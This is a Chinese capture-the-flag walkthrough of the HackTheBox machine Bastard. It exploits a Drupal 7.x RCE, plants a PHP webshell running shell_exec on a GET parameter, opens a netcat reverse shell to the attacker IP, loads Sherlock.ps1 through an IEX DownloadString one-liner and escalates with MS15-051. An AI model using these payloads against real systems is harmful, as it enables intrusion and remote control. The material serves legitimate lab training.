1. 程式人生 > >HTB系列之七:Bastard

HTB系列之七:Bastard

__出品|MS08067實驗室(www.ms08067.com)__ 這次挑戰的是 HTB 的第7臺靶機:Bastard ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193216855-921407871.png) **技能收穫:** * PHP Unserilaize * CMS Version Identify * Windows privilege escalation :Sherlock ##資訊收集 ###基本資訊 Bastard IP:10.10.10.9 Kali IP:10.10.14.23 ###埠列舉 ``` nmap -A -p- -v -T4 10.10.10.9 ``` ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193320010-656308383.png) 發現開啟了80(IIS),訪問之 ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193329375-231710904.png) 看起來是drupal cms,訪問 robots.txt ,發現版本變更檔案 ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193337512-1257656956.png) ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193345478-1117298206.png) 版本:Drupal 7.54 ###漏洞發現 ``` searchsploit drupal 7.x ``` ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193415732-612154102.png) 該版本存在 rce ,編輯 exploit ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193422569-1254174295.png) 該exploit會攻擊由服務擴充套件建立的REST端點,我們只需要找出REST端點的名稱即可利用該漏洞。 ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193430835-228966777.png) 通過目錄列舉,我們發現 endpoint 為 /rest,用其替換exploit ``` gobuster -q dir --url http://10.10.10.9 -t 50 --wordlist ./word.txt ``` ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193458850-2022426512.png) ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193502387-1066864109.png) ###漏洞利用 ``` php exp.php ``` ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193604249-88847172.png) 沒有反應,掛上 burpsuite 看看 ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193613174-1111488039.png) ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193617117-2135860615.png) 設定 exp 的target為 burp 的監聽埠 ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193626211-1999236740.png) ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193629315-977103639.png) 依然沒回應,那應該是缺少php包,未成功傳送 檢查發現,Kali缺少 php-curl 包,安裝好成功返回響應並寫入 shell.php ``` apt install php-curl ``` ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193658049-268960701.png) ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193701363-1180740927.png) 利用 session.json 可以偽造會話,成功登入 ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193710799-662461747.png) ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193715174-1648481382.png) 已知目標是 x64 的系統,我們上傳 nc.exe 下載地址:https://eternallybored.org/misc/netcat/ 給 exp 新增一個檔案上傳功能,也可以使用 smb檔案共享,使用 copy \\ip\nc64.exe nc.exe上傳 ``` $phpmine = <<<'EOD' " . shell_exec($_GET['fexec']) . ""; }; ?> EOD; $file = [ 'filename' => 'cmd.php', 'data' => $phpmine ]; ``` ``` 10.10.10.9/233.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.14.15 4444 ``` ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308194148678-1054939113.png) ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308194155582-628165617.png) ###許可權提升 ``` git clone git clone https://github.com/rasta-mouse/Sherlock.git ``` Sherlock是一個在Windows下用於本地提權的PowerShell指令碼 ``` http://10.10.10.9/cmd.php?fexec=echo IEX(New-Object System.Net.Webclient).DownloadString('http://10.10.14.15:8000/Sherlock.ps1') | powershell -noprofile - ``` ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308194300087-1516944118.png) 提示 ms15-051 , 利用之 提權程式下載地址:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip 上傳並執行 ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308194318856-1806504790.png) 建立 nc 會話 ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308194327521-24176357.png) 至此完成 ###參考文章 Drupal 7.x RCE 漏洞分析 附EXP: https://www.xctf.org.cn/library/details/58bd0f2c4d4c77aef7d15787cb65008a6533b87a/       **轉載請聯絡作者並註明出處!** Ms08067安全實驗室專注於網路安全知識的普及和培訓。團隊已出版《Web安全攻防:滲透測試實戰指南》,《內網安全攻防:滲透測試實戰指南》,《Python安全攻防:滲透測試實戰指南》,《Java程式碼安全審計(入門篇)》等書籍。 團隊公眾號定期分享關於CTF靶場、內網滲透、APT方面技術乾貨,從零開始、以實戰落地為主,致力於做一個實用的乾貨分享型公眾號。 官方網站:https://www.ms08067.com/ 掃描下方二維碼加入實驗室VIP社群 加入後邀請加入內部VIP群,內部微信群永久有效!

相關推薦

HTB系列Bastard

__出品|MS08067實驗室(www.ms08067.com)__ 這次挑戰的是 HTB 的第7臺靶機:Bastard ![](https://img2020.cnblogs.com/blog/2289839/202103/2289839-20210308193216855-921407871.png)

Office 365 系列安裝 Office 365 ProPlus

office365 安裝office 安裝在線office 在前幾篇文章中已經完成了O365用戶的手動創建和批量導入並分配對應的許可。既然用戶已經具備使用這個服務的許可了,今天我們就一起來看看如何去使用O365,和本地的Office又有何差別,然後介紹使用即點即用技術安裝 Office 3

Exchange 2013系列部署後任務

Exchange AD Windows 到昨天為止,Exchange 的部署基本上就完成了,今天我們來看看部署完成後還需要做一些什麽工作。 一、發送連接器 默認情況下,Exchange 2013是不允許將郵件發送到域外部的,如果想要發送外部郵件,需要建立一個發送連接器。打開ECP管理界面,導航至

skyfans每天一個Liunx命令系列cpuinfo、meminfo

首先宣告:非常抱歉,昨天懶了,沒有更新基本命令的內容,主要原因是一直在看IG的比賽,看完之後3:0的戰績使朋友們高興的出去喝酒了,那看的是真解氣啊。IG算是幫RNG報仇了。但是,從IG整改隊伍的身上,我想RNG也應該多學學某種東西。好廢話不多說,開始正題(我只是

敏捷開發產品管理系列Product Owner團隊

 目的在之前的《Product Servant》一篇中曾經提到,作為產品經理或產品總監,都應該有自己的方式來根據市場和使用者情況來管理產品的走向,其中前者更傾向於具體的功能,而後者則更傾向於市場方向的競爭力;前者要求細節,後者要求高度。那麼,這兩個人到底誰是傳統意義上的Pro

logback系列繼承RollingFileAppender,儲存自定義檔名的日誌

繼承類:package com.hk3t.air.system.log; import ch.qos.logback.classic.spi.ILoggingEvent; import ch.qos

JVM系列位元組碼執行

Javap– class檔案反彙編工具– javap –verbose Calcjava 檔案public class Calc {public int calc() {int a = 500;int b = 200;int c = 50;return (a + b) / c

深入理解Tomcat系列詳解URL請求

前言 這裡分析一個實際的請求是如何在Tomcat中被處理的,以及最後是怎麼樣找到要處理的Servlet的?當我們在瀏覽器中輸入http://hostname:port/contextPath/servletPath,前面的hostname與port用於建立tc

算法系列愛因斯坦的思考題(下)

CheckGroupRelation()函式需要根據當前組group的位置進行適當的處理,如果當前組是第一個組或最後一個組,則group的相鄰組只有一個,就是最靠近group的組,其它情況下group的相鄰組都是兩個。CheckGroupRelation()函式的實現如下:

VALSE2017系列視覺與語言領域年度進展概述

點選上方“深度學習大講堂”可訂閱哦!編者按:視覺和自然語言處理長期以來是兩個獨立的課題,而深度學

ZooKeeper系列ZooKeeper命令列工具

當啟動 ZooKeeper 服務成功之後,輸入下述命令,連線到 ZooKeeper 服務: zkCli.sh –server 10.77.20.23:2181 連線成功後,系統會輸出 ZooKeeper 的相關環境以及配置資訊,並在螢幕輸出“ Welcome to

Java併發程式設計系列正確終止與恢復執行緒

前面提到了stop()、suspend()等方法在終止與恢復執行緒的弊端,那麼問題來了,應該如何正確終止與恢復執行緒呢?這裡可以使用兩種方法:interrupt()方法和使用boolean變數進行控制。 在使用interrupt方法之前,有必要介紹一下中斷以及

算法系列愛因斯坦的思考題(上)

這是一個很有趣的邏輯推理題,傳說是愛因斯坦提出來的,他宣稱世界上只有2%的人能解出這個題目,傳說不一定屬實,但是這個推理題還是很有意思的。題目是這樣的,據說有五個不同顏色的房間排成一排,每個房間裡分別住著一個不同國籍的人,每個人都喝一種特定品牌的飲料,抽一種特定品牌的煙,養

kubernetes系列一些將legacy應用遷移到kubernetes的經驗

一、前言基於kubernetes的應用實際上是微服務在container方向的例項,所以很多微服務的設計原則在kubernetes框架內依然具有參考價值,比如The Twelve Factors。在legacy應用從基於VM的部署向基於kubernetes部署的遷移過程中,需

f2fs 系列page cache相關操作和接口

sub ddr 獲得 有一個 緩存 submit syn 文件 ESS 同ext4 一樣, f2fs 把不需要sync的寫通過page cache的接口落盤。為此,有必要了解f2fs中 page cache相關的接口。 以讀為例: do_read_inode依據inode節

Python貓薦書系列Python入門書籍有哪些?

本文原創並首發於公眾號【Python貓】,未經授權,請勿轉載。 原文地址:https://mp.weixin.qq.com/s/

Python 父的解析器系列PEG 解析器的元語法

原題 | A Meta-Grammar for PEG Parsers 作者 | Guido van Rossum(Python之父) 譯者 | 豌豆花下貓(“Python貓”公眾號作者) 宣告 | 本翻譯是出於交流學習的目的,基於 CC BY-NC-SA 4.0 授權協議。為便於閱讀,內容略有改動。本系列的

Android系列教程EditText使用詳解-包含很多教程上看不到的功能演示

Android系列教程目錄: 一:新建HelloEditText工程 新建一個Hello world詳細步驟可以參見 建立設定如下: Project name:HelloEditTextBuild Target :android 2.2Application name

Express全系列教程()cookie的加密

fun return 部分 ror 重新 provided 取出 ole 底層 一、關於cookie加密 cookie加密是讓客戶端用戶無法的值cookie明文信息,是數據安全的重要部分;一般的我們可以在保存cookie時對cookie信息進行加密,或者在res.cook

[C# 網絡編程系列]專題UDP編程補充——UDP廣播程序的實現

tca ssa 程序 als learn ans targe focus ase 上次因為時間的關系,所以把上一個專題遺留下的一個問題在本專題中和大家分享下,本專題主要介紹下如何實現UDP廣播的程序,下面就直接介紹實現過程和代碼以及運行的結果。 一、程序實現 UDP廣播程序